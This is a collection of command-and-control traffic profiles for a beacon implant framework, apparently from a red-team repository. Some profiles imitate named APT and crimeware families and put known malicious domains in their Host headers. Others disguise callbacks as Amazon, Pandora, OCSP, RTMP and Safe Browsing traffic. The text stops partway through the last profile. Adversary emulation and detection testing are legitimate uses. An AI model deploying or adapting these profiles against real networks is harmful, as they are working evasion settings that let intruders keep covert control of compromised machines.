├── APT ├── comfoo.profile ├── etumbot.profile ├── pitty_tiger.profile ├── putter.profile ├── string_of_paerls.profile └── taidoor.profile ├── crimeware ├── asprox.profile ├── fiesta.profile ├── fiesta2.profile ├── magnitude.profile └── zeus.profile └── normal ├── amazon.profile ├── oscp.profile ├── pandora.profile ├── rtmp.profile └── safebrowsing.profile /APT/comfoo.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Comfoo profile 3 | # http://www.secureworks.com/cyber-threat-intelligence/threats/secrets-of-the-comfoo-masters/ 4 | # 5 | # Author: @harmj0y 6 | # 7 | 8 | set sleeptime "30000"; # use a ~30s delay between callbacks 9 | set jitter "20"; 10 | set maxdns "255"; 11 | set useragent "Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)"; 12 | 13 | http-get { 14 | 15 | set uri "/CWoNaJLBo/VTNeWw11212/"; 16 | 17 | client { 18 | 19 | header "Accept" "image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*"; 20 | header "Accept-Language" "en-en"; 21 | header "Connection" "Keel-Alive"; 22 | header "Cache-Control" "no-cache"; 23 | 24 | metadata { 25 | netbiosu; 26 | append "/UTWOqVQ132/"; 27 | uri-append; 28 | } 29 | } 30 | 31 | server { 32 | 33 | header "Server" "Apache/2.0.50 (Unix)"; 34 | header "Keep-Alive" "timeout=15, max=90"; 35 | 36 | output { 37 | print; 38 | } 39 | } 40 | } 41 | 42 | http-post { 43 | 44 | set uri "/CWoNaJLBo/VTNeWw11213/"; 45 | 46 | client { 47 | 48 | header "Accept" "image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*"; 49 | header "Accept-Language" "en-en"; 50 | header "Connection" "Keel-Alive"; 51 | header "Cache-Control" "no-cache"; 52 | 53 | id { 54 | netbiosu; 55 | append "/UTWOqVQ132/"; 56 | uri-append; 57 | } 58 | 59 | output { 60 | print; 61 | } 62 | } 63 | 64 | server { 65 | 66 | header "Server" "Apache/2.0.50 (Unix)"; 67 | header "Keep-Alive" "timeout=15, max=90"; 68 | 69 | output { 70 | base64; 71 | print; 72 | } 73 | } 74 | } 75 | 76 | 
-------------------------------------------------------------------------------- /APT/etumbot.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Etumbot Profile 3 | # http://www.arbornetworks.com/asert/2014/06/illuminating-the-etumbot-apt-backdoor/ 4 | # 5 | # Author: @harmj0y 6 | # 7 | 8 | set sleeptime "5000"; 9 | set jitter "0"; 10 | set maxdns "255"; 11 | set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)"; 12 | 13 | http-get { 14 | 15 | set uri "/image/"; 16 | 17 | client { 18 | 19 | header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8"; 20 | header "Referer" "http://www.google.com"; 21 | header "Pragma" "no-cache"; 22 | header "Cache-Control" "no-cache"; 23 | 24 | metadata { 25 | netbios; 26 | append "-.jpg"; 27 | uri-append; 28 | } 29 | } 30 | 31 | server { 32 | 33 | header "Content-Type" "img/jpg"; 34 | header "Server" "Microsoft-IIS/6.0"; 35 | header "X-Powered-By" "ASP.NET"; 36 | 37 | output { 38 | base64; 39 | print; 40 | } 41 | } 42 | } 43 | 44 | http-post { 45 | set uri "/history/"; 46 | 47 | client { 48 | 49 | header "Content-Type" "application/octet-stream"; 50 | header "Referer" "http://www.google.com"; 51 | header "Pragma" "no-cache"; 52 | header "Cache-Control" "no-cache"; 53 | 54 | id { 55 | netbiosu; 56 | append ".asp"; 57 | uri-append; 58 | } 59 | 60 | output { 61 | base64; 62 | print; 63 | } 64 | } 65 | 66 | server { 67 | 68 | header "Content-Type" "img/jpg"; 69 | header "Server" "Microsoft-IIS/6.0"; 70 | header "X-Powered-By" "ASP.NET"; 71 | 72 | output { 73 | base64; 74 | print; 75 | } 76 | } 77 | } 78 | 79 | -------------------------------------------------------------------------------- /APT/pitty_tiger.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Pitty Tiger RAT profile 3 | # http://bitbucket.cassidiancybersecurity.com/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf 4 
| # 5 | # One of several RATs used by the Pitty Tiger campaign 6 | # 7 | # Author: @harmj0y 8 | # 9 | 10 | set sleeptime "30000"; # use a ~30s delay between callbacks 11 | set jitter "20"; 12 | set maxdns "255"; 13 | set useragent "Microsoft Internet Explorer"; 14 | 15 | http-get { 16 | 17 | set uri "/FC001/JOHN"; 18 | 19 | client { 20 | 21 | header "Host" "newb02.skypetm.com.tw"; 22 | header "Connection" "Keel-Alive"; 23 | 24 | metadata { 25 | netbiosu; 26 | uri-append; 27 | } 28 | } 29 | 30 | server { 31 | 32 | header "Connection" "Keel-Alive"; 33 | header "Content-Type" "text/html"; 34 | header "Server" "IIS5.0"; 35 | 36 | output { 37 | base64; 38 | print; 39 | } 40 | } 41 | } 42 | 43 | http-post { 44 | set uri "/FC001/JOHN-"; 45 | 46 | client { 47 | 48 | header "Host" "newb02.skypetm.com.tw"; 49 | header "Connection" "Keel-Alive"; 50 | 51 | id { 52 | netbiosu; 53 | uri-append; 54 | } 55 | 56 | output { 57 | base64; 58 | print; 59 | } 60 | } 61 | 62 | server { 63 | 64 | header "Connection" "Keel-Alive"; 65 | header "Content-Type" "text/html"; 66 | header "Server" "IIS5.0"; 67 | 68 | output { 69 | base64; 70 | print; 71 | } 72 | } 73 | } 74 | 75 | -------------------------------------------------------------------------------- /APT/putter.profile: -------------------------------------------------------------------------------- 1 | # Putter Panda HTTPCLIENT Profile 2 | # http://resources.crowdstrike.com/putterpanda/ 3 | 4 | # 500ms is the default callback interval for this Web C2 shell 5 | set sleeptime "500"; 6 | 7 | http-get { 8 | # Beacon will randomly choose from this pool of URIs 9 | set uri "/MicrosoftUpdate/ShellEx/KB242742/default.aspx"; 10 | 11 | client { 12 | header "User-Agent" "Mozilla/4.0 (Compatible; MSIE 6.0;Windows NT 5.1)"; 13 | 14 | # deliberate attempt to reproduce a bug in HTTPCLIENT 15 | header "Accept" "*/*, ..., ......, ."; 16 | 17 | # encode session metadata into the tmp parameter 18 | metadata { 19 | netbiosu; 20 | parameter "tmp"; 21 | } 22 | } 23 | 24 | # no 
special server side indicators as the report didn't say anything one way 25 | # or the other about these. 26 | server { 27 | header "Content-Type" "application/octet-stream"; 28 | 29 | output { 30 | print; 31 | } 32 | } 33 | } 34 | 35 | http-post { 36 | set uri "/MicrosoftUpdate/GetUpdate/KB"; 37 | 38 | client { 39 | header "Content-Type" "application/octet-stream"; 40 | header "User-Agent" "Mozilla/4.0 (Compatible; MSIE 6.0;Windows NT 5.1)"; 41 | 42 | id { 43 | append "/default.asp"; 44 | uri-append; 45 | } 46 | 47 | output { 48 | print; 49 | } 50 | } 51 | 52 | server { 53 | header "Content-Type" "text/html"; 54 | 55 | output { 56 | print; 57 | } 58 | } 59 | } 60 | -------------------------------------------------------------------------------- /APT/string_of_paerls.profile: -------------------------------------------------------------------------------- 1 | # 2 | # String of Paerls profile 3 | # http://blogs.cisco.com/security/a-string-of-paerls/ 4 | # 5 | # Author: @harmj0y 6 | # 7 | 8 | set sleeptime "30000"; # use a ~30 second main interval 9 | set jitter "30"; # 35% jitter 10 | set maxdns "255"; 11 | set useragent "Mozilla/4.0"; 12 | 13 | http-get { 14 | 15 | # GET request modeled as well as possible based on incomplete information 16 | set uri "/2/R.exe"; 17 | 18 | client { 19 | 20 | header "Content-Type" "application/x-www-form-urlencoded"; 21 | 22 | # encode session metadata 23 | metadata { 24 | base64; 25 | header "Cookie"; 26 | } 27 | } 28 | 29 | server { 30 | header "Server" "Apache/2"; 31 | header "X-Powered-By" "PHP/5.3.28"; 32 | header "Vary" "User-Agent"; 33 | header "Content-Type" "application/octet-stream"; 34 | 35 | output { 36 | print; 37 | } 38 | } 39 | } 40 | 41 | http-post { 42 | 43 | set uri "/boss/image.php"; 44 | 45 | client { 46 | 47 | header "Content-Type" "application/x-www-form-urlencoded"; 48 | 49 | id { 50 | netbios; 51 | parameter "id"; 52 | } 53 | 54 | output { 55 | base64; 56 | print; 57 | } 58 | } 59 | 60 | server { 61 | header 
"Server" "Apache/2"; 62 | header "X-Powered-By" "PHP/5.3.28"; 63 | header "Vary" "User-Agent"; 64 | header "Content-Type" "application/octet-stream"; 65 | 66 | output { 67 | print; 68 | } 69 | } 70 | } 71 | 72 | -------------------------------------------------------------------------------- /APT/taidoor.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Taidoor Profile 3 | # http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html 4 | # 5 | # Author: @harmj0y 6 | # 7 | 8 | set sleeptime "40000"; # use a ~40 second main interval 9 | set jitter "35"; # 35% jitter 10 | set maxdns "255"; 11 | set useragent "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"; 12 | 13 | http-get { 14 | 15 | set uri "/login.jsp /parse.jsp /page.jsp /default.jsp /index.jsp /process.jsp /security.jsp /user.jsp"; 16 | 17 | client { 18 | 19 | header "Connection" "Keep-Alive"; 20 | header "Cache-Control" "no-cache"; 21 | 22 | # encode session metadata 23 | metadata { 24 | netbiosu; 25 | parameter "mn"; 26 | } 27 | } 28 | 29 | # no special server side indicators as the report didn't say anything one way 30 | # or the other about these. 
31 | server { 32 | header "Server" "Microsoft-IIS/5.0"; 33 | header "Content-Type" "text/html"; 34 | header "Connection" "close"; 35 | 36 | output { 37 | base64; 38 | prepend "\n"; 43 | append "\n"; 44 | append "\n"; 45 | print; 46 | } 47 | } 48 | } 49 | 50 | http-post { 51 | set uri "/submit.jsp"; 52 | 53 | client { 54 | 55 | header "Connection" "Keep-Alive"; 56 | header "Cache-Control" "no-cache"; 57 | 58 | id { 59 | netbios; 60 | parameter "du"; 61 | } 62 | 63 | output { 64 | print; 65 | } 66 | } 67 | 68 | server { 69 | header "Server" "Microsoft-IIS/5.0"; 70 | header "Content-Type" "text/html"; 71 | header "Connection" "close"; 72 | 73 | output { 74 | print; 75 | } 76 | } 77 | } 78 | 79 | -------------------------------------------------------------------------------- /crimeware/asprox.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Asprox botnet traffic profile 3 | # http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-asprox-reborn.pdf 4 | # 5 | # Author: @harmj0y 6 | # 7 | 8 | 9 | set sleeptime "30000"; # use a ~30s delay between callbacks 10 | set jitter "20"; # throw in a 10% jitter 11 | set maxdns "255"; 12 | set useragent "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"; 13 | 14 | http-get { 15 | 16 | set uri "/"; 17 | 18 | client { 19 | 20 | header "Accept" "*/*"; 21 | header "Content-Type" "application/x-www-form-urlencoded"; 22 | header "Content-Transfer-Encoding" "base64"; 23 | header "Connection" "Keep-Alive"; 24 | 25 | metadata { 26 | netbiosu; 27 | uri-append; 28 | } 29 | } 30 | 31 | server { 32 | 33 | header "Server" "nginx/1.2.5"; 34 | header "Content-Type" "text/html"; 35 | header "X-Powered-By" "PHP/5.4.4-7"; 36 | header "Vary" "Accept-Encoding"; 37 | 38 | output { 39 | base64; 40 | print; 41 | } 42 | } 43 | } 44 | 45 | http-post { 46 | 47 | # random hash to try to simulate the post uri in the report 48 | set uri 
"/78dc91f1A716DBBAA9E4E12C884C1CB1C27FFF2BEEED7DF1"; 49 | 50 | client { 51 | 52 | header "Accept" "*/*"; 53 | header "Content-Type" "application/x-www-form-urlencoded"; 54 | header "Content-Transfer-Encoding" "base64"; 55 | header "Connection" "Keep-Alive"; 56 | 57 | id { 58 | parameter "id"; 59 | } 60 | 61 | output { 62 | base64; 63 | print; 64 | } 65 | } 66 | 67 | server { 68 | 69 | header "Server" "nginx/1.2.5"; 70 | header "Content-Type" "text/html"; 71 | header "X-Powered-By" "PHP/5.4.4-7"; 72 | header "Vary" "Accept-Encoding"; 73 | 74 | output { 75 | base64; 76 | print; 77 | } 78 | } 79 | } 80 | 81 | -------------------------------------------------------------------------------- /crimeware/fiesta.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Fiesta Exploit Kit traffic profile 3 | # http://malware-traffic-analysis.net/2014/04/05/index.html 4 | # 5 | # Author: @harmj0y 6 | # 7 | 8 | set sleeptime "30000"; # use a ~30s delay between callbacks 9 | set jitter "10"; # throw in a 10% jitter 10 | set maxdns "255"; 11 | set useragent "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_11"; 12 | 13 | http-get { 14 | 15 | set uri "/rmvk30g/"; 16 | 17 | client { 18 | # mimic this Fiesta instance's header information 19 | header "Accept" "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"; 20 | header "Connection" "keep-alive"; 21 | 22 | # encode session metadata as close as we can to a Fiesta URI request 23 | metadata { 24 | netbios; 25 | append ";1;4;1"; 26 | uri-append; 27 | } 28 | } 29 | 30 | server { 31 | header "Server" "Apache/2.2.15 (CentOS)"; 32 | header "X-Powered-By" "PHP/5.3.27"; 33 | header "Content-Type" "application/octet-stream"; 34 | header "Connection" "close"; 35 | 36 | output { 37 | print; 38 | } 39 | } 40 | } 41 | 42 | http-post { 43 | 44 | set uri "/"; 45 | 46 | client { 47 | 48 | # fake out a different user agent for the post back 49 | header "User-Agent" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 
6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3; .NET4.0C; .NET4.0E)"; 50 | 51 | id { 52 | netbios; 53 | uri-append; 54 | } 55 | 56 | output { 57 | base64; 58 | print; 59 | } 60 | } 61 | 62 | server { 63 | header "Server" "nginx/1.4.2"; 64 | header "Content-Type" "text/html"; 65 | header "Connection" "close"; 66 | 67 | output { 68 | base64; 69 | print; 70 | } 71 | } 72 | } 73 | 74 | -------------------------------------------------------------------------------- /crimeware/fiesta2.profile: -------------------------------------------------------------------------------- 1 | # 2 | # A second Fiesta Exploit Kit traffic profile 3 | # http://malware-traffic-analysis.net/2014/04/05/index.html 4 | # 5 | # Author: @harmj0y 6 | # 7 | 8 | set sleeptime "30000"; # use a ~30s delay between callbacks 9 | set jitter "10"; # throw in a 10% jitter 10 | set maxdns "255"; 11 | 12 | http-get { 13 | 14 | set uri "/v20idaf/"; 15 | 16 | client { 17 | # mimic this Fiesta instance's header information 18 | header "Accept" "*/*"; 19 | header "User-Agent" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"; 20 | 21 | # encode session metadata as closely as we can to a Fiesta URI request 22 | metadata { 23 | netbios; 24 | append ";112202;228"; 25 | uri-append; 26 | } 27 | } 28 | 29 | server { 30 | header "Server" "nginx/1.4.4"; 31 | header "Content-Type" "application/octet-stream"; 32 | header "Connection" "close"; 33 | 34 | output { 35 | print; 36 | } 37 | } 38 | } 39 | 40 | http-post { 41 | 42 | set uri "/"; 43 | 44 | client { 45 | 46 | header "Accept" "*/*"; 47 | header "User-Agent" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"; 48 | 49 | id { 50 | netbios; 51 | uri-append; 52 | } 53 | 54 | output { 55 | base64; 56 | 
print; 57 | } 58 | } 59 | 60 | server { 61 | header "Server" "nginx/1.4.4"; 62 | header "Content-Type" "application/octet-stream"; 63 | header "Connection" "close"; 64 | 65 | output { 66 | print; 67 | } 68 | } 69 | } 70 | 71 | -------------------------------------------------------------------------------- /crimeware/magnitude.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Magnitude Exploit Kit traffic profile 3 | # http://malware-traffic-analysis.net/2014/06/17/index.html 4 | # 5 | # Author: @harmj0y 6 | # 7 | 8 | set sleeptime "45000"; # use a ~45s delay between callbacks 9 | set jitter "50"; # throw in a 50% jitter 10 | set maxdns "255"; 11 | set useragent "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"; 12 | 13 | http-get { 14 | 15 | set uri "/themes/index.php"; 16 | 17 | client { 18 | 19 | header "Accept" "image/jpeg, application/*"; 20 | header "Referer" "http://www.bankofbotswana.bw/"; 21 | header "Accept-Encoding" "gzip, deflate"; 22 | 23 | # throw in a known bad malware domain 24 | header "Host" "wilfredcostume.bamoon.com"; 25 | 26 | metadata { 27 | netbios; 28 | parameter "id"; 29 | } 30 | } 31 | 32 | server { 33 | header "Server" "Apache/2.2.17 (Ubuntu)"; 34 | header "X-Powered-By" "PHP/5.3.5-1ubuntu7.8"; 35 | header "Content-Encoding" "gzip"; 36 | header "Content-Type" "text/html"; 37 | 38 | output { 39 | print; 40 | } 41 | } 42 | } 43 | 44 | http-post { 45 | 46 | set uri "/work/1.php"; 47 | 48 | client { 49 | 50 | header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; 51 | header "Accept-Language" "en-US;q=0.5,en;q=0.3"; 52 | header "Accept-Encoding" "gzip, deflate"; 53 | header "Content-Type" "application/octet-stream"; 54 | 55 | id { 56 | netbiosu; 57 | parameter "sid"; 58 | } 59 | 60 | output { 61 | print; 62 | } 63 | } 64 | 65 | server { 66 | 67 | header "Server" "Apache/2.2.17 
(Ubuntu)"; 68 | header "X-Powered-By" "PHP/5.3.5-1ubuntu7.8"; 69 | header "Content-Encoding" "gzip"; 70 | header "Content-Type" "text/html"; 71 | 72 | output { 73 | print; 74 | } 75 | } 76 | } 77 | 78 | -------------------------------------------------------------------------------- /crimeware/zeus.profile: -------------------------------------------------------------------------------- 1 | # 2 | # ZeuS Sample Profile 3 | # client - https://malwr.com/analysis/NjIwNTU2ODA2OTUxNDcwNmJiMTMzYzk4YzU4NWQyZDQ/ 4 | # server - http://malware-traffic-analysis.net/2014/04/05/index.html 5 | # 6 | # Author: @harmj0y 7 | # 8 | 9 | set sleeptime "30000"; 10 | set jitter "5"; 11 | set maxdns "255"; 12 | set useragent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"; 13 | 14 | http-get { 15 | 16 | set uri "/metro91/admin/1/ppptp.jpg"; 17 | 18 | client { 19 | 20 | header "Accept" "*/*"; 21 | header "Connection" "Close"; 22 | 23 | # throw in a known/old Zeus C2 domain 24 | header "Host" "mahamaya1ifesciences.com"; 25 | header "Cache-Control" "no-cache"; 26 | 27 | metadata { 28 | base64; 29 | header "Cookie"; 30 | } 31 | } 32 | 33 | server { 34 | header "Server" "nginx/1.0.4"; 35 | header "Content-Type" "text/html"; 36 | header "Connection" "close"; 37 | header "X-Powered-By" "PHP/5.3.8-1~dotdeb.2"; 38 | 39 | output { 40 | print; 41 | } 42 | } 43 | } 44 | 45 | http-post { 46 | 47 | set uri "/metro91/admin/1/secure.php"; 48 | 49 | client { 50 | 51 | header "Accept" "*/*"; 52 | header "Connection" "Keep-Alive"; 53 | 54 | # throw in a known/old Zeus C2 domain 55 | header "Host" "mahamaya1ifesciences.com"; 56 | header "Cache-Control" "no-cache"; 57 | 58 | id { 59 | netbios; 60 | parameter "id"; 61 | } 62 | 63 | output { 64 | print; 65 | } 66 | } 67 | 68 | server { 69 | header "Server" "nginx/1.0.4"; 70 | header "Content-Type" "text/html"; 71 | header "Connection" "close"; 72 | header "X-Powered-By" "PHP/5.3.8-1~dotdeb.2"; 73 | 74 | output { 75 | print; 76 | } 77 | } 
78 | } 79 | 80 | -------------------------------------------------------------------------------- /normal/amazon.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Amazon browsing traffic profile 3 | # 4 | # Author: @harmj0y 5 | # 6 | 7 | set sleeptime "5000"; 8 | set jitter "0"; 9 | set maxdns "255"; 10 | set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"; 11 | 12 | http-get { 13 | 14 | set uri "/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books"; 15 | 16 | client { 17 | 18 | header "Accept" "*/*"; 19 | header "Host" "www.amazon.com"; 20 | 21 | metadata { 22 | base64; 23 | prepend "session-token="; 24 | prepend "skin=noskin;"; 25 | append "csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996"; 26 | header "Cookie"; 27 | } 28 | } 29 | 30 | server { 31 | 32 | header "Server" "Server"; 33 | header "x-amz-id-1" "THKUYEZKCKPGY5T42PZT"; 34 | header "x-amz-id-2" "a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo="; 35 | header "X-Frame-Options" "SAMEORIGIN"; 36 | header "Content-Encoding" "gzip"; 37 | 38 | output { 39 | print; 40 | } 41 | } 42 | } 43 | 44 | http-post { 45 | 46 | set uri "/N4215/adj/amzn.us.sr.aps"; 47 | 48 | client { 49 | 50 | header "Accept" "*/*"; 51 | header "Content-Type" "text/xml"; 52 | header "X-Requested-With" "XMLHttpRequest"; 53 | header "Host" "www.amazon.com"; 54 | 55 | parameter "sz" "160x600"; 56 | parameter "oe" "oe=ISO-8859-1;"; 57 | 58 | id { 59 | parameter "sn"; 60 | } 61 | 62 | parameter "s" "3717"; 63 | parameter "dc_ref" "http%3A%2F%2Fwww.amazon.com"; 64 | 65 | output { 66 | base64; 67 | print; 68 | } 69 | } 70 | 71 | server { 72 | 73 | header "Server" "Server"; 74 | header "x-amz-id-1" "THK9YEZJCKPGY5T42OZT"; 75 | header "x-amz-id-2" "a21JZ1xrNDNtdGRsa219bGV3YW85amZuZW9zdG5rZmRuZ2tmZGl4aHRvNDVpbgo="; 76 | header "X-Frame-Options" "SAMEORIGIN"; 77 | header "x-ua-compatible" "IE=edge"; 78 | 79 | output { 80 | print; 81 | } 82 | } 83 | 
} 84 | -------------------------------------------------------------------------------- /normal/oscp.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Online Certificate Status Protocol (OCSP) Profile 3 | # http://tools.ietf.org/html/rfc6960 4 | # 5 | # Author: @harmj0y 6 | # 7 | 8 | set sleeptime "20000"; # Use a 20s interval 9 | set jitter "20"; # 20% jitter 10 | set maxdns "255"; 11 | set useragent "Microsoft-CryptoAPI/6.1"; 12 | 13 | 14 | http-get { 15 | 16 | set uri "/oscp/"; 17 | 18 | client { 19 | header "Accept" "*/*"; 20 | header "Host" "ocsp.verisign.com"; 21 | 22 | metadata { 23 | netbios; 24 | uri-append; 25 | } 26 | } 27 | 28 | server { 29 | header "Content-Type" "application/ocsp-response"; 30 | header "content-transfer-encoding" "binary"; 31 | header "Cache-Control" "max-age=547738, public, no-transform, must-revalidate"; 32 | header "Connection" "keep-alive"; 33 | 34 | output { 35 | print; 36 | } 37 | } 38 | } 39 | 40 | http-post { 41 | 42 | set uri "/oscp/a/"; 43 | 44 | client { 45 | 46 | header "Accept" "*/*"; 47 | header "Host" "ocsp.verisign.com"; 48 | 49 | id { 50 | netbios; 51 | uri-append; 52 | } 53 | 54 | output { 55 | print; 56 | } 57 | } 58 | 59 | server { 60 | header "Content-Type" "application/ocsp-response"; 61 | header "content-transfer-encoding" "binary"; 62 | header "Cache-Control" "max-age=547738, public, no-transform, must-revalidate"; 63 | header "Connection" "keep-alive"; 64 | 65 | output { 66 | print; 67 | } 68 | } 69 | } 70 | 71 | -------------------------------------------------------------------------------- /normal/pandora.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Standard Pandora traffic profile 3 | # 4 | # Author: @harmj0y 5 | # 6 | 7 | set sleeptime "1000"; 8 | set jitter "0"; 9 | set maxdns "255"; 10 | set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"; 11 | 12 | http-get { 13 
| 14 | set uri "/access/"; 15 | 16 | client { 17 | 18 | header "Accept" "*/*"; 19 | header "GetContentFeatures.DLNA.ORG" "1"; 20 | header "Host" "audio-sv5-t1-3.pandora.com"; 21 | header "Cookie" " __utma=210077622.1732439995.1433201462.1403204372.1385202493.2;"; 22 | 23 | parameter "version" "4"; 24 | parameter "lid" "1582502724"; 25 | 26 | metadata { 27 | netbios; 28 | parameter "token"; 29 | } 30 | } 31 | 32 | server { 33 | 34 | header "Server" "Apache"; 35 | header "Cache-Control" "no-cache, no-store, must-revalidate, max-age=-1"; 36 | header "Pragma" "no-cache, no-store"; 37 | #header "Expires" "-1"; 38 | header "Connection" "close"; 39 | header "Content-Type" "audio/mp4"; 40 | 41 | output { 42 | 43 | # mp4 header 44 | # 0000000: 0000 001c 6674 7970 6d70 3432 0000 0001 ....ftypmp42.... 45 | # 0000010: 4d34 5620 6d70 3432 6973 6f6d 0001 6fd9 M4V mp42isom..o. 46 | 47 | prepend "\x6d\x6f\x6f\x76\x00\x00\x00\x6c\x6d\x76\x68\x64"; 48 | prepend "\x4d\x34\x56\x20\x6d\x70\x34\x32\x69\x73\x6f\x6d\x00\x01\x6f\xd9"; 49 | prepend "\x00\x00\x00\x1c\x66\x74\x79\x70\x6d\x70\x34\x32\x00\x00\x00\x01"; 50 | 51 | print; 52 | } 53 | } 54 | } 55 | 56 | http-post { 57 | 58 | set uri "/radio/xmlrpc/v35"; 59 | 60 | client { 61 | 62 | header "Accept" "*/*"; 63 | header "Content-Type" "text/xml"; 64 | header "X-Requested-With" "XMLHttpRequest"; 65 | header "Host" "www.pandora.com"; 66 | 67 | id { 68 | parameter "rid"; 69 | } 70 | 71 | parameter "lid" "1582502724"; 72 | parameter "method" "getSearchRecommendations"; 73 | 74 | output { 75 | base64; 76 | print; 77 | } 78 | } 79 | 80 | server { 81 | 82 | header "Content-Type" "text/xml"; 83 | header "Cache-Control" "no-cache, no-store, no-transform, must-revalidate, max-age=0"; 84 | header "Expires" "-1"; 85 | header "Vary" "Accept-Encoding"; 86 | header "Content-Encoding" "gzip"; 87 | 88 | output { 89 | print; 90 | } 91 | } 92 | } 93 | -------------------------------------------------------------------------------- /normal/rtmp.profile: 
-------------------------------------------------------------------------------- 1 | # 2 | # Adobe Real-Time Messaging Protocol (RTMP) profile 3 | # 4 | # Author: @harmj0y 5 | # 6 | 7 | set sleeptime "5000"; 8 | set jitter "0"; 9 | set maxdns "255"; 10 | set useragent "Shockwave Flash"; 11 | 12 | http-get { 13 | 14 | set uri "/idle/1376547834/1"; 15 | 16 | client { 17 | 18 | header "Accept" "*/*"; 19 | header "Connection" "Keep-Alive"; 20 | header "Cache-Control" "no-cache"; 21 | header "Content-Type" "application/x-fcs"; 22 | 23 | metadata { 24 | base64; 25 | header "Cookie"; 26 | } 27 | } 28 | 29 | server { 30 | 31 | header "Content-Type" "application/x-fcs"; 32 | header "Connection" "Keep-Alive"; 33 | header "Server" "FlashCom/3.5.7"; 34 | header "Cache-Control" "no-cache"; 35 | 36 | output { 37 | print; 38 | } 39 | } 40 | } 41 | 42 | http-post { 43 | 44 | set uri "/send/1376547834/"; 45 | 46 | client { 47 | 48 | header "Accept" "*/*"; 49 | header "Connection" "Keep-Alive"; 50 | header "Cache-Control" "no-cache"; 51 | header "Content-Type" "application/x-fcs"; 52 | 53 | id { 54 | uri-append; 55 | } 56 | 57 | output { 58 | print; 59 | } 60 | } 61 | 62 | server { 63 | 64 | header "Content-Type" "application/x-fcs"; 65 | header "Connection" "Keep-Alive"; 66 | header "Server" "FlashCom/3.5.7"; 67 | header "Cache-Control" "no-cache"; 68 | 69 | output { 70 | print; 71 | } 72 | } 73 | } 74 | -------------------------------------------------------------------------------- /normal/safebrowsing.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Safebrowsing Comms profile 3 | # https://code.google.com/p/google-safe-browsing/wiki/SafeBrowsingDesign 4 | # 5 | # Author: @harmj0y 6 | # 7 | 8 | set sleeptime "30000"; # Use a 30s interval 9 | set jitter "20"; # 20% jitter 10 | set maxdns "255"; 11 | set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"; 12 | 13 | http-get { 14 | 15 | # 
change/randomize this as you wish 16 | set uri "/safebrowsing/rd/CltOb12nLW1IbHehcmUtd2hUdmFzEBAY7-0KIOkUDC7h2"; 17 | 18 | client { 19 | header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; 20 | header "Accept-Language" "en-US,en;q=0.5"; 21 | header "Accept-Encoding" "gzip, deflate"; 22 | 23 | metadata { 24 | netbios; 25 | prepend "PREF=ID="; 26 | header "Cookie"; 27 | } 28 | } 29 | 30 | server { 31 | header "Content-Type" "application/vnd.google.safebrowsing-chunk"; 32 | header "X-Content-Type-Options" "nosniff"; 33 | header "Content-Encoding" "gzip"; 34 | header "X-XSS-Protection" "1; mode=block"; 35 | header "X-Frame-Options" "SAMEORIGIN"; 36 | header "Cache-Control" "public,max-age=172800"; 37 | header "Age" "1222"; 38 | header "Alternate-Protocol" "80:quic"; 39 | 40 | output { 41 | print; 42 | } 43 | } 44 | } 45 | 46 | http-post { 47 | 48 | set uri "/safebrowsing/rd/CINnu27nLO8hbHdfgmUtc2ihdmFyEAcY4"; 49 | 50 | client { 51 | header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; 52 | header "Accept-Language" "en-US,en;q=0.5"; 53 | header "Accept-Encoding" "gzip, deflate"; 54 | 55 | id { 56 | netbios; 57 | prepend "U=779b64e1a7ed737a"; 58 | prepend "PREF=ID="; 59 | header "Cookie"; 60 | } 61 | 62 | output { 63 | print; 64 | } 65 | } 66 | 67 | server { 68 | header "Content-Type" 